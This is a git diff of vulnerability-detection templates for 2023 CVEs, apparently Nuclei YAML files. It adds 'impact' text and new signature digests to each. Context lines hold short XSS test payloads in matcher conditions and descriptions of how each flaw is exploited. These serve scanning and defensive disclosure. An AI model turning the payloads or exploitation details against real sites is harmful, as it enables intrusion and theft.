+# digest: 4a0a00473045022024f28e295c6b7cc43eb216eabd999c7c92a6c3012dc21cf57b89d8d75c3e9ef20221008ecd83389c67868f6c17f00562a5931b18bd5106e3759adfbe5de83e052c2060:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml
index e7d8351ba9..da207fb406 100644
--- a/http/cves/2023/CVE-2023-20888.yaml
+++ b/http/cves/2023/CVE-2023-20888.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by VMware to mitigate this vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
           - 'csrfToken":"([a-z0-9A-Z/+=]+)"'
         internal: true
         part: body
-# digest: 4a0a00473045022100f0ac0e56ea093fc3ad476629cf07ccf22dcd11594a578d68069748cda7cd7d1f02201bf0e9dc7bb62f0e06e4837df5224e27e7884c7a329c12d45e573e65ba4d617b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e8b7ff76cf89799e51f9be360b53f0d914dffb2c45b9806a679e0aae9cf14d72022100c15a6de298b2b89a6d98ab686959feda113cc69270b5d4668dc8596f9bd7799e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml
index 13d4d2cd01..e8ab151af0 100644
--- a/http/cves/2023/CVE-2023-20889.yaml
+++ b/http/cves/2023/CVE-2023-20889.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.
   remediation: |
     Apply the latest security patches provided by VMware to mitigate this vulnerability.
   reference:
@@ -84,4 +86,4 @@ http:
           - csrfToken":"([a-z0-9A-Z/+=]+)"
         internal: true
         part: body
-# digest: 4a0a00473045022005a60a0cdaecba0b8760152d2d8709b79671a089dbf75675ff8dd1c578c6ce14022100d79ad625cf3f6e0a9ff92c5eea099ae01ab616561308cea560b1d4d73247367f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022066806cd0de95bd76fa0f0eee3146162d2b57e34372ada4b4db96891e2b8c4f15022100ba0509ee2cb48fe2e9884046c83a2fba7abf5529b3d64af930688aca4a5cf55c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml
index 6cbae1954f..9a9a2393a0 100644
--- a/http/cves/2023/CVE-2023-2130.yaml
+++ b/http/cves/2023/CVE-2023-2130.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
           - 'contains(header, "text/html")'
           - 'contains(body, "Supplier Name")'
         condition: and
-# digest: 490a00463044022013dbb14f99bb81c733ae2f9b321c7923684d957794b82b804cc3f3c3c7aff68902202687650589d6ab9f944987bd517e4e7ea3e38abf18a8ebb1a0d5ab8a07e6ebb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fe6e1296a21552819fab20ff3d1614327be20bd39399e1459122c4387d3544fa02204ec34b0678b98bd0a53ec5829e51ccd12d415933320ce9d5565353376902adb1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml
index 688fae39f8..2196464883 100644
--- a/http/cves/2023/CVE-2023-2178.yaml
+++ b/http/cves/2023/CVE-2023-2178.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
           - 'contains(body_2, "></textarea><script>alert(document.domain)</script>")'
           - 'contains(body_2, "page_aajoda-testimonials")'
         condition: and
-# digest: 4b0a00483046022100c425c51b95282d202b8a4ef90101fc313b7e8cd5f79a554d5a1b850474db610c0221008f25a95b58ea40496cae4d2932d9fbfae3a805e02ef3f2866fa68b77e0e826d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cfb58ea3be8a9772943669ad1b1fa9ca02fde55e5b5eb56e5baf0dfc83326d5d022100af744a7fbbd58a6f6d988e2a5bcb9d64aaf4d92fb7d375993458af34b6095774:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml
index a9681d0e70..a0a450a6fb 100644
--- a/http/cves/2023/CVE-2023-22463.yaml
+++ b/http/cves/2023/CVE-2023-22463.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access and control of the Kubernetes cluster.
   remediation: The vulnerability has been fixed in 1.6.3. In the patch, JWT key is specified in app.yml. If the user leaves it blank, a random key will be used. There are no workarounds aside from upgrading.
   reference:
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20JwtSigKey%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2023-22463.md
@@ -29,6 +31,7 @@ info:
     shodan-query: html:"kubepi"
     fofa-query: "kubepi"
   tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud
+
 variables:
   name: "{{rand_base(6)}}"
   password: "{{rand_base(8)}}"
@@ -76,4 +79,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022079a3f82c8580d18c075350211879e04dc5f1d7d3f96dc5874ae74ca9a9878250022100a1d56282fae76af927fa1eea058bd1c1e595cd597bb35317fbf1daa1c2c6522f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d44e3ef79d8d6e467e5b7af508772a2adc5ced2d3f10bbeda4647e2131cfb89c022100e5babccd2d04769cae0fd2c19166fc7ba63d03da0247f56bb7add596e5b04a4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml
index 326ca41497..dae21cda72 100644
--- a/http/cves/2023/CVE-2023-22478.yaml
+++ b/http/cves/2023/CVE-2023-22478.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.
+  impact: |
+    An attacker can gain unauthorized access to sensitive information.
   remediation: |
     Upgrade KubePi to a version higher than v1.6.4 to mitigate the vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205b055d80922e204d4d28c72607dfcd4ed013489c6508cb09ab085cb49f93ea8d022043879220a10f7203f5f6c722b9f729e3d99b7e69ed30e4fa5e8b04799e7912fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022032b44e197affa5ab4d5897cd87fb7e3cd8c136f10b0904df7936033811e4f497022100dc6f65d6ce8491574115262cc07f6fa25f77234055b9856889284d92a9184d5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml
index 86ea04114b..b3cb588467 100644
--- a/http/cves/2023/CVE-2023-22480.yaml
+++ b/http/cves/2023/CVE-2023-22480.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4.
+  impact: |
+    An attacker can download sensitive files from the KubeOperator Foreground kubeconfig file, potentially leading to unauthorized access or exposure of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220090dddc323910ac05d534b3be5a9a734f5a3ea641e4f3d30d2472bda655232d2022016910be6c06f7f02651c1d649a64db9af4d668465e26e1b7845298510e5ed27d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201854346af08d6b107a54b5cef1fea962339812ebd7b5a62374e6452fcab019c202202d97da6f09247a91a38fc24318d231616b4264db9a63bf912bc82f5bbdd7f7c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml
index e5725b8d3f..8661dbb139 100644
--- a/http/cves/2023/CVE-2023-2252.yaml
+++ b/http/cves/2023/CVE-2023-2252.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: Fixed in version 7.5.4
   reference:
     - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69
@@ -38,5 +40,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a004730450220483bccb4c989b5932f7e7bc2b7d8fd9b314b85cc66f43604f7c40770edc1f0070221008d52f1047b3eac64223c83c9fed7d7c616e0e3c529331f5edc139e1eaa080ffa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b042e61606d69f9562a9b203c909295e5d7d9ea161dfdb48d24bfac6f801fc28022015ed1f232eaeed2d3517fded71b973babe5b7071dda064e6dc2f1cde0b24eb82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml
index 7402231a5d..f38e22ed0a 100644
--- a/http/cves/2023/CVE-2023-22620.yaml
+++ b/http/cves/2023/CVE-2023-22620.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or perform actions on behalf of the user.
   remediation: Upgrade to version 12.2.5.1 or newer
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-22620
@@ -69,4 +71,4 @@ http:
         regex:
           - '"sessionid": "([a-z0-9]+)"'
         internal: true
-# digest: 4a0a0047304502206e1c5e5e34408bd5698f008884476f72af42d7df9b9a1cf47204912d97519027022100e565bfc492c0718b2442cadb562bfcba947005518ac374ff5717ffdbd4a86362:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205d23c191835e513ea2373a52a3f128a0079d8ba59c4dfb6c187afe58afd1c40402210084b98a60f9988b110b43f52aeeea8cbcb1bbb6aec2b9375f058fef2e4042084d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml
index b8e7a788ad..f9ce667785 100644
--- a/http/cves/2023/CVE-2023-2272.yaml
+++ b/http/cves/2023/CVE-2023-2272.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to a patched version of Tiempo.com (version 0.1.3 or above) that addresses the XSS vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
           - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
           - 'contains(body_2, "Tiempo")'
         condition: and
-# digest: 4b0a00483046022100cb3014d2e57ebef3ecfb4122fc46bbb6e008745fd404b4f0d1ce80664d9ad6c3022100abc9640ae90d41301735680d10ccc409078bd784984522d5a18a47617a875100:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022012a569d89ef4b1e46fdfaedbfcfab974c90978e0d134cc408b55913699649e4c022100a95dc660c36906f87990bb6d53146129e0bead5166025dd7578677f54d662fc3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml
index 4dd0b3d27c..1882faff96 100644
--- a/http/cves/2023/CVE-2023-22897.yaml
+++ b/http/cves/2023/CVE-2023-22897.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information stored in the device's memory.
   remediation: |
     Apply the latest security patches and updates provided by Securepoint to fix the memory leakage issue.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a00f5717e5d909104251d44631e3c0e25994d098a4643204f455f19544b6e8a4022037e7b30d4d53eef416a0608ad708c789a02747cb38078e0614722b16603135a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dbda697d29324ec7b241ea20a76bac1448a9741a376ee78786baacc3451859b6022065d41b83a263720a82a8f4ec17da9666b970ccd35e44939fd6f460fedc94ee80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml
index f9a85e3ea5..88b3471559 100644
--- a/http/cves/2023/CVE-2023-23161.yaml
+++ b/http/cves/2023/CVE-2023-23161.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100edabfdd8338f064e0d11b776764863aea69256cb85eda1fea569f957ec429a9702206dd8908a478057383ede8524c1aad0c196c8bb03bbafbea01a2de0dfe74a1404:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201ba519b83c6cc7b0cfc747995fe1fd5f43a790e7343908a60e658011a15c1d47022007bf702fa8235e432d185f8b223570caa526cdaac6c9b74eb53862955c19aca1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml
index 5caffca7fc..0232bbf663 100644
--- a/http/cves/2023/CVE-2023-23333.yaml
+++ b/http/cves/2023/CVE-2023-23333.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c42c7491eb0325df332260060cbcf12f83e931b9b2d0db672bda4c4bb8c63ed402205b87a3f9efd4944d0543c784db62ed172706331dba8f689daa84189a890d7b19:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ffbb9e4f2f637a5cfe75e258d05d53c584459b3a201a3c5345e63e73a1321107022100d9bfba84dc673b16d1ca767943542045643077b865dac8869d48c6f23af72e7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml
index 8d9518e219..adec14054e 100644
--- a/http/cves/2023/CVE-2023-23488.yaml
+++ b/http/cves/2023/CVE-2023-23488.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
   remediation: |
     Upgrade to WordPress Paid Memberships Pro version 2.9.8 or later to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - status_code_1 != 403 # Wordfence
           - contains(body_2, "pmpro_updates")
         condition: and
-# digest: 4b0a00483046022100ef2c53528c0819c31d2973a59ada3ac52b198aa609886e20a6857fea10a9dacc022100acfb1c3d4951370048012dc349b7e516f4a4bee83fddfaae9178c2765c855538:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220402527c9584590f5791942a8d02bad515300172679fc3744512999593a8af05c022069894295200ef6248301fae9e59d31372cd29779d21e900af41ea11574b065c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml
index 3f594e2310..eae5a8facf 100644
--- a/http/cves/2023/CVE-2023-23489.yaml
+++ b/http/cves/2023/CVE-2023-23489.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Update to the latest version of Easy Digital Downloads plugin (3.1.0.4 or higher) to mitigate the SQL Injection vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'status_code_1 == 200'
           - 'contains(body_1, "[]") && contains(body_2, "Easy Digital Downloads")'
         condition: and
-# digest: 490a00463044022078be97c55e98bb5aa950cbeeb8ac34365f74777ba924fd114b5a108ce4f59e5f0220515563fe326a28f5e8e585ee2301baec1502821140f804022bae59d6b2fb15c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d6bd1130e5127e73ecd44f9becaa57e7b1fcbbfe5639e175674084255709f71602200c67f45c13ea730e38621b86a3fbc680a0ba5ac338774d5938d896171ae8944f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml
index 5a7385c03a..df02391efc 100644
--- a/http/cves/2023/CVE-2023-23492.yaml
+++ b/http/cves/2023/CVE-2023-23492.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Login with Phone Number, versions < 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the theft of sensitive user information or unauthorized actions.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220460ad6d7e69d41a4c61787a68540dc3aaa36fa65bf7d685aff6bcc39bdf80ed3022042e20bba0a091c5cca8c123463fb7029c9df492fb837173ca94a6f633345d9f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203cbff1e7d88181adc30b87325ddc3138fa28d94b33e109abd2a60b5cbdb3ddeb022100dd0813584a410bc80d7d1caeff48599912b023cdaf755eb63de348996e529ec1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml
index 01aee10bab..1764f47de5 100644
--- a/http/cves/2023/CVE-2023-2356.yaml
+++ b/http/cves/2023/CVE-2023-2356.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.
+  impact: |
+    Successful exploitation could allow an attacker to read sensitive files on the server.
   remediation: |
     Upgrade Mlflow to version 2.3.0 or above to mitigate the vulnerability.
   reference:
@@ -67,4 +69,4 @@ http:
           - '"version": "([0-9.]+)",'
         internal: true
         part: body
-# digest: 4a0a0047304502200a699e91fb339343e3d4804424a2b982ff017caecfff5f7d8b7b0ca4c8751d31022100aef9df06e2bd14326e6734c8b47c7138f9a4612d2c4def106df8e30f76dd07aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220461442bbc08a7b8657ece098aafb2bcb86b89f089396ab38a1cb3f9fd7eacee40221008bee2d0ff37335cf617f2363d679f957cd0555cd35df849c3a4c82a1237e8fdf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml
index 6f4fa08d9a..c0f9b58bf6 100644
--- a/http/cves/2023/CVE-2023-23752.yaml
+++ b/http/cves/2023/CVE-2023-23752.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
+  impact: |
+    The vulnerability can lead to unauthorized access to user passwords, compromising the confidentiality of user accounts.
   remediation: Upgrade to Joomla! version 4.2.8 or later.
   reference:
     - https://unsafe.sh/go-149780.html
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100947c1d7ee6582f8f4c1aaad290cf1d024063387495e2f81001367ca8813ddc4502210083d0bc4e23b1e3abf23c2acd98fbca8c34144d6f99e60fc5a0647970ce5a31e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a1527640280c7a21301388dead1457c8fdc63c9554ff6706f0f0899522dc5b98022039831b37c69a1fe282cb35cbb7a2a91530140b35196ad7ed63d83bdf5d4d3b4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml
index 3ec017745b..48582ade11 100644
--- a/http/cves/2023/CVE-2023-24044.yaml
+++ b/http/cves/2023/CVE-2023-24044.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature."
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
   remediation: |
     Upgrade Plesk Obsidian to a version higher than 18.0.49 to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 303
-# digest: 4a0a00473045022100984b541c4e08f16f34f2cf30fb6e927f67f274eabedbc8110e235d79015c799902203af1d90fe04350524dc18e5d8ce23aee1c94b3ba01197be7719b8f80edab934a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c827c682ab69a527a8c637d2cfcd6ba76c243f33f26fba64dea94c85b43f916f022100fff6224d4dfaa518e122949fc7cb85cc3cd10fa59340385032bcf679f8a5abd6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml
index bb2cd490f9..eee2f39a97 100644
--- a/http/cves/2023/CVE-2023-24243.yaml
+++ b/http/cves/2023/CVE-2023-24243.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the server, potentially leading to unauthorized access or data leakage.
   remediation: |
     Apply the latest security patches or updates provided by CData to fix the SSRF vulnerability in RSB Connect v22.0.8336.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 490a00463044022060c9e6cefe4d17971087e54fd605f6e272bbcd835a2e39b30e5a060c66d0117802204afef3fd8adb14a2db96bf80c405188cea83cbca7c765cc89ee30e5ffca5c6a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d14641dab02d7ae94f4438f578875b0e1824dfb55be0ca53ca9e65a828b1948b02200eb2ea49094e7959a5949b8631f267f814566ced9a6b2df7d605b40a155d8afb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml
index 3c7b1c7a66..a3a2ed6100 100644
--- a/http/cves/2023/CVE-2023-24278.yaml
+++ b/http/cves/2023/CVE-2023-24278.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to Squidex CMS version 7.4.0 or later to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008921d99e927c5e23cd0e8bcf412892acf5d57ac4c7d241c609378c78ca69f624022100f7204a1cd25f48a3fd6bf514e2d9fd41705a8a02442ac35d73fbe6bbf23bb2fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220099e79405b26842882a4427e2179d91350a021a9d4e9748e5e7ab317ac9e0c37022100baf1c59025a7b3694c76d6c1f89846e8281931534871d9dc1f350b3d1c7ce7c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-24367.yaml b/http/cves/2023/CVE-2023-24367.yaml
index f7a1e27f40..6e4f8a5e16 100644
--- a/http/cves/2023/CVE-2023-24367.yaml
+++ b/http/cves/2023/CVE-2023-24367.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix this vulnerability. Additionally, implement input validation and output encoding to prevent XSS attacks.
   reference:
@@ -40,5 +42,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a004630440220254bd2edaad2242ac5ad5e52ab0d2c2768342e58f617707a85196f19dd84b04f02206c5c4f1d846b2ab90f04c8bbbc5179148d39886796f628f8545555dcea718a36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205e82bf77faeba9fcbbaeb1dd7af909beb2729ce1f30a80b3b38c7914df6096e1022100d284b03ef40321c829f2261111b4b7391023f9175489eaba1cdb013f94143a97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
